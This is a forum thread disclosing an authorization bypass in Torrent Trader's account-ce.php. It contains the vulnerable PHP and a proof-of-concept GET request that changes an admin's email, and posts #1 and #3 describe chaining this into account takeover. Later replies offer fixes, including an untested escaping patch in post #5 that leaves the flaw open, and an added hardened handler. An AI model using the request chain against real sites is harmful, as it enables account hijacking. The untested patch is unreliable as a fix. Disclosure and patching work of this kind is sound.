Bravo List > Source Code > Active Trackers > Torrent Trader
#1  9th April 2019, 19:28  BamBam0077 (Banned; Join Date: Jul 2013; Posts: 410)
Unauthorized Email Change
###############################################################################
1. Unauthorized Email Change in "account-ce.php"
###############################################################################

Reason: authorization bypass
Attack vector: user-submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

-----------------[ source code start ]---------------------------------

PHP Code:
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
-----------------[ source code end ]-----------------------------------

Tests: Let's find the md5 hash of the email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452".
The target user ID is 1. We issue the GET request: http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com
A quick look at the database confirms that the email address of the user with ID 1 has indeed been changed.
The next logical move for the attacker is a password recovery request: http://localhost/torrenttrader208/account-recover.php
After the admin account takeover, the attacker is able to use the next vulnerability, described below, which may allow PHP remote code execution.

###############################################################################

Last edited by Thor; 14th April 2019 at 11:31. Reason: Edited Code to make it Readable
#2  13th April 2019, 05:15  MicroMonkey (Senior Member; Join Date: Jun 2016; Posts: 52)
What is that? Please explain in full detail.
#3  13th April 2019, 15:36  BamBam0077 (Banned; Join Date: Jul 2013; Posts: 410)
Reason: authorization bypass
Attack vector: user-submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's
Code:
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
..
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
..
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));

Tests: Let's find the md5 hash of the email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452". The target user ID is 1. We issue the GET request: http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com

A quick look at the database confirms that the email address of the user with ID 1 has indeed been changed.

The next logical move for the attacker is a password recovery request: http://localhost/torrenttrader208/account-recover.php After the admin account takeover, the attacker is able to use the next vulnerability, described below, which may allow PHP remote code execution.
#4  30th April 2019, 16:22  M-jay (VIP; Join Date: May 2018; Posts: 19)
This would be SQL injection, correct? I've been looking at adding something to improve this. So far it looks like PDO is the best, or can you do it using composer.json?
I'm new to this, but could you point us in the right direction to implement one of these?
#5  21st October 2019, 19:39  BamBam0077 (Banned; Join Date: Jul 2013; Posts: 410)
Just sanitize the variables in the SQL query where necessary with sqlesc(), or mysqli_real_escape_string() if you have converted over to mysqli, and I believe try to use trim() around:

PHP Code:
$md5 = $_GET["secret"];
$email = $_GET["email"];
$sec = $row["editsecret"];
SQL ESC
PHP Code:
// sqlesc() already wraps its result in quotes (as in the original UPDATE's use of it), so no extra quotes around the id
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = " . sqlesc($id));
AND
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = " . sqlesc($email) . " WHERE `id` = " . sqlesc($id) . " AND `editsecret` = " . sqlesc($row["editsecret"]));
NOT TESTED YET, WILL TRY WHEN PC HAS ARRIVED
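The handler below is an added example and is not code from this thread or from Torrent Trader. It addresses the flaw post #1 demonstrates (the md5 check passes for any account whose `editsecret` is empty, because md5('' . $email . '') is just md5($email), and the UPDATE's `editsecret = ''` condition then matches) rather than only the escaping post #5 proposes; the prepared statements also answer the PDO-versus-escaping question in post #4 (PDO works the same way). It assumes a mysqli connection in `$db`, that `editsecret` holds a random token written when the change-email confirmation was sent, that `show_error_msg()` terminates the script as the original relies on, and that the `T_()` message keys other than NOTHING_FOUND are placeholders.

```php
<?php
// Added example, not Torrent Trader's code: a hardened confirmation step for
// account-ce.php. Assumptions (not on the page): $db is a mysqli connection,
// `editsecret` holds a random token written when the change-email mail was
// sent, show_error_msg() terminates the script as the original relies on, and
// the T_() message keys other than NOTHING_FOUND are placeholders.

$id     = isset($_GET['id'])     ? (int) $_GET['id']              : 0;
$secret = isset($_GET['secret']) ? (string) $_GET['secret']      : '';
$email  = isset($_GET['email'])  ? trim((string) $_GET['email']) : '';

// Validate the input before touching the database.
if ($id <= 0 || !filter_var($email, FILTER_VALIDATE_EMAIL)) {
    show_error_msg(T_("ERROR"), T_("INVALID_INPUT"), 1);
}

// Prepared statement: the id is bound, not interpolated, so no sqlesc() is needed.
$stmt = $db->prepare(
    "SELECT `editsecret` FROM `users` "
    . "WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = ?"
);
$stmt->bind_param('i', $id);
$stmt->execute();
$stmt->bind_result($sec);
$found = $stmt->fetch();
$stmt->close();

// The original check passed for any account with no pending change, because
// md5('' . $email . '') is just md5($email). Refuse unless a token is pending.
if ($found !== true || $sec === null || $sec === '') {
    show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
}

// Compare the submitted token in constant time against the expected value.
$expected = md5($sec . $email . $sec);
if (!hash_equals($expected, $secret)) {
    show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
}

// Apply the change and clear the token in one statement, keyed on the token,
// so a replayed confirmation link cannot apply it a second time.
$stmt = $db->prepare(
    "UPDATE `users` SET `editsecret` = '', `email` = ? "
    . "WHERE `id` = ? AND `editsecret` = ? AND `editsecret` <> ''"
);
$stmt->bind_param('sis', $email, $id, $sec);
$stmt->execute();
$changed = ($stmt->affected_rows === 1);
$stmt->close();

if (!$changed) {
    show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
}
```

The random token, not knowledge of the email address, is what authorizes the change here: an empty `editsecret` is treated as "nothing to confirm" instead of being folded into the hash, the comparison uses `hash_equals()`, and both queries bind their parameters, which removes the need for `sqlesc()` on `$id` and `$email` altogether.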